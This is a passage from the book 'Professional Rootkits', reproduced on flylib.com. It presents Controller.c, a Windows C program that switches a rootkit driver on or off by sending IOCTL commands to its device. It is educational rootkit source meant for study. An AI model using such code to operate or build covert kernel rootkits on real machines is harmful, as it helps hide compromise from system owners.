Controller.c


The file Controller.c accepts an ON or OFF command and sends either GHOST_ON or GHOST_OFF to the device found at GHOST_DEVICE_OPEN_NAME. These definitions have been added to the new file, IoManager.h. This new file can be included by any application that needs to communicate with the rootkit:

  // Controller // Copyright Ric Vieler, 2006 // Send an on/off command to MyDeviceDriver #include <windows.h> #include <stdio.h> #include <io.h> #include "IoManager.h" void main(int argc, char *argv[]) {  HANDLE deviceHandle;  GHOST_IOCTLDATA control = { 0 };  ULONG status = 0;  if(( argc < 2 ) || ((stricmp(argv[1],"on") != 0)) && ((stricmp(argv[1],"off") != 0)))  {   printf ("Use Controller on\n");   printf ("or  Controller off\n");   return;  }  deviceHandle = CreateFile( GHOST_DEVICE_OPEN_NAME,   GENERIC_READ | GENERIC_WRITE,   0,   NULL,   OPEN_EXISTING,   FILE_ATTRIBUTE_NORMAL,   NULL);  if (deviceHandle == INVALID_HANDLE_VALUE)  {   printf ("Could not find MyDeviceDriver.\n");   return;  }  if(stricmp(argv[1],"on") == 0)   control.command = GHOST_ON;  else   control.command = GHOST_OFF;  if( DeviceIoControl(deviceHandle,   GHOST_ON_OFF_COMMAND,   &control,   sizeof(control), // input   (PVOID)&control,   sizeof(control), // output   &status,   NULL ) )   printf ("MyDeviceDriver %s.\n", control.command == GHOST_ON ? "on" : "off" );  else   printf ("DeviceIoControl failed.\n");  CloseHandle(deviceHandle); } 




Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler

Similar book on Amazon
Rootkits: Subverting the Windows Kernel
Rootkits: Subverting the Windows Kernel
A Guide to Kernel Exploitation: Attacking the Core
A Guide to Kernel Exploitation: Attacking the Core
Reversing: Secrets of Reverse Engineering
Reversing: Secrets of Reverse Engineering
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net